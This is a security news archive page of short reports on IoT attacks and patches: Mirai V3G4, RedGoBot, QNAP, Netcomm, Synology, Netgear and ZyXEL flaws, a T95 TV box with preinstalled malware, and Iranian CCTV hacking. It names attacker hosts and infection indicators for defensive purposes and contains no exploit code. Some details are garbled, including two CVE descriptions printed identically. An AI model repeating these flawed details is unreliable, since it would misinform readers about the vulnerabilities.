Category Archives: Internet of Things

Mirai V3G4 botnet exploits 13 flaws to target IoT devices

During the second half of 2022, a variant of the Mirai bot, tracked as V3G4, targeted IoT devices by exploiting tens of flaws.

Palo Alto Networks Unit 42 researchers reported that a Mirai variant called V3G4 was attempting to exploit several flaws to infect IoT devices from July to December 2022. 

Below is the list of vulnerabilities exploited by V3G4:

The threat actors’ goal is to infect the largest number of systems as possible to compose a botnet that can be used to conduct multiple attacks, including DDoS attacks.

The researchers have observed three different Mirai V3G4 campaigns likely operated by the same threat actor for the following reasons:

  • The hardcoded command and control (C2) domains among these three campaigns contain the same string (8xl9)
  • The malware shell script downloaders are almost identical between the three campaigns
  • The botnet client samples use the same XOR decryption key
  • The botnet client samples use the same “stop list” (a list of target processes that the botnet client searches for and terminates)
  • The botnet client samples use almost identical functions

The botnet exploited 13 vulnerabilities to achieve remote code execution on vulnerable devices. Upon successful exploitation, the malicious code executes wget and curl utilities to download Mirai bot from attackers’ infrastructure and then execute it.

Upon execution, the bot prints xXxSlicexXxxVEGA. to the console. The experts noticed that V3G4 also supports a function that makes sure only one instance of this malware is executing on the compromised device. If a botnet process already exists, the botnet client will and exit.

The botnet also attempts to terminate a list of processes, included in the hardcoded ‘stop list,’ by checking their names on the infected device.

Unlike most Mirai variants, the V3G4 variant uses different XOR encryption keys for string encryption.

The researchers also noticed that the bot samples from the three campaigns have minor differences. The original Mirai botnet sample spreads itself by brute-forcing weak telnet/SSH credentials, while other variants rely brute-force attacks and embedded exploits to spread.

However, bot samples discovered between September and December 2022 don’t contain the functions of vulnerability exploitation and brute force of credentials.

“The vulnerabilities mentioned above have less attack complexity than previously observed variants, but they maintain a critical security impact that can lead to remote code execution. Once the attacker gains control of a vulnerable device in this manner, they could take advantage by including the newly compromised devices in their botnet to conduct further attacks such as DDoS.” concludes the report. “Therefore, it is highly recommended that patches and updates are applied when possible.”

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, V3G4)

Over 30k Internet-Exposed QNAP NAS hosts impacted by CVE-2022-27596 flaw

Censys found 30,000 internet-facing QNAP appliances potentially impacted by a recently disclosed critical code injection flaw.

On January 30, Taiwanese vendor QNAP released QTS and QuTS firmware updates to address a critical vulnerability, tracked as CVE-2022-27596 (CVSS v3 score: 9.8), that affects QNAP NAS devices.

A remote attacker can exploit the vulnerability to inject malicious code on QNAP NAS devices. The flaw is easy to exploit without user interaction or privileges on the vulnerable device.

The flaw impacts QTS 5.0.1 and QuTS hero h5.0.1 versions.

“A vulnerability has been reported to affect QNAP devices running QTS 5.0.1 and QuTS hero h5.0.1. If exploited, this vulnerability allows remote attackers to inject malicious code.” reads the advisory published by the Taiwanese vendor.

The company fixed the vulnerability in the following operating system versions:

  • QTS 5.0.1.2234 build 20221201 and later
  • QuTS hero h5.0.1.2248 build 20221215 and later”

Cyber security firm Censys scanned the Internet for internet-exposed QNAP appliances and discovered 30,000 devices that are likely affected by the CVE-2022-27596 flaw because are running QTS 5.0.1 and QuTS hero h5.0.1 vulnerable versions.

Censys discovered 67,415 hosts allegedly running a QNAP-based system, but they were able to obtain the version number only from 30,520 hosts.

“But, if the advisory is correct, over 98% of identified QNAP devices would be vulnerable to this attack. We found that of the 30,520 hosts with a version, only 557 were running QuTS Hero greater than or equal to “h5.0.1.2248” or QTS greater than or equal to “5.0.1.2234”, meaning 29,968 hosts could be affected by this vulnerability.” reads the report published by Censys. “If the exploit is published and weaponized, it could spell trouble to thousands of QNAP users. Everyone must upgrade their QNAP devices immediately to be safe from future ransomware campaigns.”

Most of the vulnerable hosts discovered by Censys are in Italy (3,200), followed by the US (3,149) and Taiwan (1,942).

Experts used the advisory (QSA-23-01) to determine vulnerable versions, and discovered that the Top Vulnerable versions are:

VersionHost Count
5.0.07.383
4.3.36,993
4.3.64,777

“while there are no indications that bad actors are using this new exploit, the threat is definitely on the horizon.” Censys concludes.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, IoT)

QNAP addresses a critical flaw impacting its NAS devices

Taiwanese vendor QNAP is warning customers to install QTS and QuTS firmware updates to address a critical flaw impacting its NAS devices.

QNAP released QTS and QuTS firmware updates to address a critical vulnerability, tracked as CVE-2022-27596 (CVSS v3 score: 9.8), that affects QNAP NAS devices.

A remote attacker can exploit the vulnerability to inject malicious code on QNAP NAS devices. The flaw is easy to exploit without user interaction or privileges on the vulnerable device.

The flaw impacts QTS 5.0.1 and QuTS hero h5.0.1 versions.

“A vulnerability has been reported to affect QNAP devices running QTS 5.0.1 and QuTS hero h5.0.1. If exploited, this vulnerability allows remote attackers to inject malicious code.” reads the advisory published by the Taiwanese vendor.

“We have already fixed this vulnerability in the following operating system versions:

  • QTS 5.0.1.2234 build 20221201 and later
  • QuTS hero h5.0.1.2248 build 20221215 and later”

Below is the step-by-step procedure to update QTS or QuTS hero:

  1. Log in to QTS or QuTS hero as an administrator.
  2. Go to Control Panel > System > Firmware Update.
  3. Under Live Update, click Check for Update.
    QTS or QuTS hero downloads and installs the latest available update.

Users can also download the update from the QNAP website by going to Support > Download Center and then performing a manual update for their specific device.

The company urges customers to apply security updates as soon as possible.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Moshen Dragon)

Experts warn of a surge of attacks exploiting a Realtek Jungle SDK RCE (CVE-2021-35394)

Experts warn of a spike in the attacks that between August and October 2022 attempted to exploit a Realtek Jungle SDK RCE (CVE-2021-35394).

Palo Alto Networks researchers reported that between August and October 2022 the number of attacks that attempted to exploit a Realtek Jungle SDK RCE (CVE-2021-35394) (CVSS score 9.8) accounted for more than 40% of the total number of attacks.

“Realtek Jungle SDK version v2.x up to v3.4.14B provides a diagnostic tool called ‘MP Daemon’ that is usually compiled as ‘UDPServer’ binary. The binary is affected by multiple memory corruption vulnerabilities and an arbitrary command injection vulnerability that can be exploited by remote unauthenticated attackers.” reads the description for this flaw.

As of December 2022, experts observed 134 million exploit attempts in total leveraging this flaw, and about 97% of these attacks occurred after the start of August 2022.

The experts warned that the attacks conducted by multiple threat actors are still ongoing.

A large number of these attacks attempted to deliver malware to vulnerable IoT devices. Most of the malware samples analyzed by the researchers belong to MiraiGafgyt and Mozi families. Palo Alto Networks also observed a new distributed IoT denial-of-service (DDoS) botnet developed in Golang, tracked as RedGoBot. The RedGoBot botnet was involved in multiple campaigns, the first one observed in early September 2022, when the threat actor tried to deliver a shell script znet.sh downloader from 185.216.71[.]157 utilizing wget.

A second RedGoBot campaign was observed in November 2022, when the threat actor used a shell script with wget and curl to download the following botnet clients from 185.246.221[.]220.

The RedGoBot can perform DDoS attacks on HTTP, ICMP, TCP, UDP, VSE and OpenVPN protocols.

It has been estimated that the flaw CVE-2021-35394 affects almost 190 models of devices from 66 different manufacturers.

The analysis of the attacks in the wild revealed the use of the following three types of payloads:

  • A script executes a shell command on the targeted server (mostly from the Mirai).
  • An injected command directly writes the binary payload to a file and then executes it. 
  • An injected command directly reboots the targeted server to trigger a denial of service condition.

The analysis of the origin of the attacks revealed that the United States is the main source of attacks (48.3% of the total), followed by Vietnam (17.8%) and Russia (14.6%). 

However, we have to consider that the attackers might have used proxy servers and VPNs located in those countries to hide their actual physical locations.

“The surge of attacks leveraging CVE-2021-35394 shows that threat actors are very interested in supply chain vulnerabilities, which can be difficult for the average user to identify and remediate. These issues can make it difficult for the affected user to identify the specific downstream products that are being exploited.” concludes the report.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

[adrotate banner=”9″][adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, CVE-2021-35394)

[adrotate banner=”5″]

[adrotate banner=”13″]

A couple of bugs can be chained to hack Netcomm routers

A couple of critical vulnerabilities have been discovered in Netcomm rourers, experts warn of their potential exploitation in the wild.

The vulnerabilities discovered in the Netcomm routers are a a stack based buffer overflow and an authentication bypass, respectively tracked as CVE-2022-4873 and CVE-2022-4874.

Both issues impact the Netcomm router models NF20MESH, NF20, and NL1902 running software versions earlier than R6B035.

Below are the descriptions for both issues:

CVE-2022-4873 – Authentication bypass in Netcomm router models NF20MESH, NF20, and NL1902 allows an unauthenticated user to access content. In order to serve static content, the application performs a check for the existence of specific characters in the URL (.css, .png etc). If it exists, it performs a “fake login” to give the request an active session to load the file and not redirect to the login page.

CVE-2022-4874 – Authentication bypass in Netcomm router models NF20MESH, NF20, and NL1902 allows an unauthenticated user to access content. In order to serve static content, the application performs a check for the existence of specific characters in the URL (.css, .png etc). If it exists, it performs a “fake login” to give the request an active session to load the file and not redirect to the login page.

The CERT Coordination Center (CERT/CC) also published an advisory to warn of attacks chaining the two issues to achieve remote code execution on vulnerable systems.

“Netcomm router models NF20MESH, NF20, and NL1902 running software versions earlier than R6B035 contain two vulnerabilities.” reads the advisory. “The two vulnerabilities, when chained together, permit a remote, unauthenticated attacker to execute arbitrary code.”

The advisory pointed out that once the attacker has obtained unauthorized access to affected devices, he can use those entry points to gain access to other systems on the network or compromise the availability, integrity, or confidentiality of data being transmitted from the internal network.

The flaw was discovered by Brendan Scarvell who also published PoC to show how to chain the two vulnerabilities to achieve unauthenticated remote code execution.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

[adrotate banner=”9″][adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, Netcomm)

[adrotate banner=”5″]

[adrotate banner=”13″]

T95 Android TV Box sold on Amazon hides sophisticated malware

Expert discovered that the T95 Android TV box, available for sale on Amazon and AliExpress, came with sophisticated pre-installed malware.

Security researcher, Daniel Milisic, discovered that the T95 Android TV box he purchased on Amazon was infected with sophisticated pre-installed malware.

This Android TV box model is available on Amazon and AliExpress for as low as $40.

The device came with Android 10 (with working Play store) and an Allwinner H616 processor. Milisic discovered pre-loaded malware into its firmware.

Milisic purchased the T95 Android TV box to run Pi-hole, which is a Linux network-level advertisement and Internet tracker blocking application.

After running the Pi-hole he noticed that the box was reaching addresses associated with malware campaigns.

“After searching unsuccessfully for a clean ROM, I set out to remove the malware in a last-ditch effort to make the T95 useful. I found layers on top of layers of malware using tcpflow and nethogs to monitor traffic and traced it back to the offending process/APK which I then removed from the ROM.” the expert wrote on Reddit.

“The final bit of malware I could not track down injects the system_server process and looks to be deeply-baked into the ROM. It’s pretty sophisticated malware, resembling CopyCatin the way it operates. It’s not found by any of the AV products I tried — If anyone can offer guidance on how to find these hooks into system_server please let me know here or via PM.”

The device uses an Android 10 operating system that was signed with test keys. The expert also discovered that it had the Android Debug Bridge (ADB) reachable through the Ethernet port.

The malicious code embedded in the firmware of the device acts like the Android CopyCat malware. The experts pointed out that all the AV products he tested were not able to detect the threat.

Milisic also devised a trick to block the malware using the Pi-hole to change the DNS of the command and control server, YCXRL.COM to 127.0.0.2.

He also created an iptables rule to redirect all DNS to the Pi-hole as the malware/virus/whatever will use external DNS if it can’t resolve.

“By doing this, the C&C server ends up hitting the Pi-hole webserver instead of sending my logins, passwords, and other PII to a Linode in Singapore (currently 139.162.57.135 at time of writing).” continues the expert.

Watch out, the solution proposed by Milisic doesn’t remove the malicious code or disable it, it just neutralizes it interfering with its operations.

In order to determine if s T95 Android TV Box has been infected, the researcher recommends checking the presence of a folder named:

/data/system/Corejava

and a file named

/data/system/shared_prefs/open_preference.xml?

Milisic was not able to test other devices from the same vendor or model to determine if their firmware was infected too.

“Don’t trust cheap Android boxes on AliExpress or Amazon that have firmware signed with test keys. They are stealing your data and (unless you can watch DNS logs) do so without a trace!” Milisic concludes.

Below are the cleanup instructions provided by the researcher on GitHub:

  • Reboot into recovery to reset the device or use the Reset option in the ‘about’ menu to Factory Reset the T95
  • When device comes back online, connect to adb via USB A-to-A cable or WiFi/Ethernet
  • Run the script (WiP!)

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

[adrotate banner=”9″][adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, malware)

[adrotate banner=”5″]

[adrotate banner=”13″]

Synology fixes multiple critical vulnerabilities in its routers

Synology fixed several critical flaws in its routers, including flaws likely demonstrated at the Pwn2Own 2022 hacking contest.

Taiwanese NAS maker Synology published two new critical advisories in December. The first advisory is related to the most severe vulnerability addressed by the company, which is a critical out-of-bounds write issue, tracked as CVE-2022-43931 (CVSS3 Base Score10).

The vulnerability resides in the Remote Desktop Functionality of Synology VPN Plus Server before 1.4.3-0534 and 1.4.4-0635. A remote attacker can exploit the flaw to execute arbitrary commands via unspecified vectors.

“Out-of-bounds write vulnerability in Remote Desktop Functionality in Synology VPN Plus Server before 1.4.3-0534 and 1.4.4-0635 allows remote attackers to execute arbitrary commands via unspecified vectors.” reads the advisory published by the company.

The vulnerability was discovered by researchers at the Synology PSIRT.

The second advisory addressed multiple vulnerabilities impacting the Synology Router Manager (SRM). The Router Manager (SRM) is the operating system that powers every Synology Router. An attacker can trigger the flaws to execute arbitrary commands, cause a denial-of-service condition or read arbitrary files.

“Multiple vulnerabilities allow remote attackers to execute arbitrary command, conduct denial-of-service attacks or read arbitrary files via a susceptible version of Synology Router Manager (SRM).” reads the advisory.

The flaws impact SRM 1.3 and SRM 1.2, they were reported by:

  • Orange Tsai from Devcore
  • Gaurav Baruah working with Trend Micro’s Zero Day Initiative
  • Computest working with Trend Micro’s Zero Day Initiative
  • Lukas Kupczyk from CrowdStrike

It is likely that the exploits for the above flaws were demonstrated during the Pwn2Own Toronto 2022 and reported through Trend Micro’s Zero Day Initiative.

The researcher Gaurav Baruah earned $20,000 for demonstrating a command injection attack against the WAN interface of a Synology RT6600ax router.

Computest earned $5,000 for demonstrating a command injection root shell exploit targeting the LAN interface of a RT6600ax router.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

[adrotate banner=”9″][adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, Routers)

[adrotate banner=”5″]

[adrotate banner=”13″]

NETGEAR fixes a severe bug in its routers. Patch it asap!

Netgear addressed a high-severity bug affecting multiple WiFi router models, including Wireless AC NighthawkWireless AX Nighthawk (WiFi 6), and Wireless AC.

Netgear fixed a bug affecting multiple WiFi router models, including Wireless AC NighthawkWireless AX Nighthawk (WiFi 6), and Wireless AC router models.

The vendor only said that the flaw is a pre-authentication buffer overflow vulnerability and urged customers to address the firmware of their devices as soon as possible. An attacker can exploit this vulnerability without requiring permissions or user interaction.

Threat actors often exploit this kind of issue to trigger a DoS condition or to execute arbitrary code on vulnerable devices.

“NETGEAR has released fixes for a pre-authentication buffer overflow security vulnerability” reads the advisory published by the company. “NETGEAR strongly recommends that you download the latest firmware as soon as possible.”

Below is the list of fixes released by the company for the specific product models:

  • RAX40 fixed in firmware version 1.0.2.60
  • RAX35 fixed in firmware version 1.0.2.60
  • R6400v2 fixed in firmware version 1.0.4.122
  • R6700v3 fixed in firmware version 1.0.4.122
  • R6900P fixed in firmware version 1.3.3.152
  • R7000P fixed in firmware version 1.3.3.152
  • R7000 fixed in firmware version 1.0.11.136
  • R7960P fixed in firmware version 1.4.4.94
  • R8000P fixed in firmware version 1.4.4.94

Below are step-by-step instructions to download the latest firmware for impacted router models:

  1. Visit NETGEAR Support.
  2. Start typing your model number in the search box, then select your model from the drop-down menu as soon as it appears.
    If you do not see a drop-down menu, make sure that you entered your model number correctly, or select a product category to browse for your product model.
  3. Click Downloads.
  4. Under Current Versions, select the download whose title begins with Firmware Version.
  5. Click Download.
  6. Follow the instructions in your product’s user manual, firmware release notes, or product support page to install the new firmware.

“The pre-authentication buffer overflow vulnerability remains if you do not complete all recommended steps. NETGEAR is not responsible for any consequences that could have been avoided by following the recommendations in this notification.” concludes the advisory.

The vendor did don reveal if the flaw has been actively exploited in attacks in the wild.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

[adrotate banner=”9″][adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, Netgear)

[adrotate banner=”5″]

[adrotate banner=”13″]

Expert found Backdoor credentials in ZyXEL LTE3301 M209

The cybersecurity researcher RE-Solver discovered Backdoor credentials in ZyXEL LTE3301-M209 LTE indoor routers.

Security researcher ReSolver announced the discovery of hardcoded credentials (CVE-2022-40602) in ZyXEL LTE3301-M209 LTE indoor routers.

In previous research, the expert discovered a Telnet backdoor in D-Link DWR-921 which is also present in the ZyXEL LTE3301-M209 as well. 

The researcher analyzed the commander ELF, focusing on the amit* functions that were containing the backdoor in D-Link routers.
Unlike the D-Link analysis, the researchers has no physical access to the device and attempted to retrieve the password from the config.

“The firmware is basically a merge of 3 sections, the LZMA section is the kernel, at 0x148CD6 the root-fs and at 0x90BD36 the www content.” wrote the expert. “Inside the last Squashfs there is a [censored] file which is contains at 0x10 the Zlib magic bytes.”

Once unpacked the file, ReSolver noticed the following sequence:


Despite he did not find Telnet credentials, he discovered something which looks like a backdoor in the webUI.

“Same as before and unpack the config.dat is going to contain the telnet login password” states the expert. “Let’s put things together: On ZyXEL LTE3301 we have two ways to own the device:

  • webUI credentials –> username / WebUIFakePassword
  • telnet credentials  –> root / TelnetFakePassword

Owners of impacted devices have to upgrade them with the latest firmware release as soon as possible.

Below is the timeline for this issue:

  • 12 Sep 2022: Vulnerability reported to ZyXEL
  • 13 Sep 2022: ZyXEL asks for detail in order to replicate the vulnerability.
  • 13 Sep 2022: Details sent to ZyXEL.
  • 14 Sep 2022: ZyXEL confirms that the issues only affect the LTE3301-M209 model. They’re working to the vendor to fix it. They ask to keep the information confidential until the patch has been released.
  • 17 Sep 2022: Waiting for the patch.
  • 19 Oct 2022: The issue is now tracked by CVE-2022-40602
  • 22 Nov 2022: ZyXEL’s security bullettin published. A firmware fix has been released. 
  • 24 Dec 2022 Hopefully users has now updated their own devices, It’s time to make my blog post public.

The expert and the Zyxel PSIRT decided to avoid disclosing the credentials the prevent massive exploitation in the wild.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

[adrotate banner=”9″][adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, ZyXEL LTE3301-M209)

[adrotate banner=”5″]

[adrotate banner=”13″]

An Iranian group hacked Israeli CCTV cameras, defense was aware but didn’t block it

An Iranian group hacked dozens of CCTV cameras in Israel in 2021 and maintained access for a long period of time.

An Iranian group of hackers, known as Moses Staff, had seized control of dozens of Israeli CCTV cameras, the hack was known to the authorities that did nothing to stop it, reported The Times of Israel which had access to a preview of the full investigative report.

“In a preview of a full investigative report set to be aired on Tuesday, the Kan public broadcaster said officials did not take action to secure the cameras, despite their knowledge of the activities of the group, known as Moses Staff.” reported The Times of Israel.

According to Kan, hackers gained access to the CCTV cameras and were able to control them for a lengthy period.

In 2021, the group published footage on its Telegram channel of the surroundings of Israel’s Rafael defense contractor factory in Haifa, as well as footage from cameras throughout Israeli cities of Jerusalem and Tel Aviv.

A picture shows a security camera of a big security organization that was hacked by Iranian hackers, in Jerusalem, November 24, 2022 . Photo by Olivier Fitoussi/Flash90 *** Local Caption *** אירן שב”כ מצלמת אבטחה האקר פיגוע תיעוד נפרץ – Source (The Times of Israel)

The group published several videos, including footage of an arms facility and of a terror attack in Jerusalem in November.

The video of the attack was a previously unseen footage and came from surveillance cameras used by a major Israeli security organization. The Moses Staff group claimed it had hacked security cameras.

“We’ve been surveillance [sic] you for many years, at every moment and on each step. This is just one part of our surveillance over your activities through access to CCTV cameras in the country. We had said that, we will strike you while you never would have imagined,” the group wrote on its Telegram channel in January speaking to the Israeli intelligence.

Now security officials told Kan that the footages uploaded by Moses Staff come from civilian cameras that were not connected to any security infrastructure.

According to Kan, the full report provides details on the surveillance acitvity conducted by Moses Staff by hacking the cameras to spy on senior Israeli officials, it also includes information of the Iranian group.

According to The Times of Israel, in June the Iranian hacker group claimed responsibility for a cyberattack that caused rocket sirens to go off in some areas of Jerusalem and the southern city of Eilat.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

[adrotate banner=”9″][adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, Iranian group)

[adrotate banner=”5″]

[adrotate banner=”13″]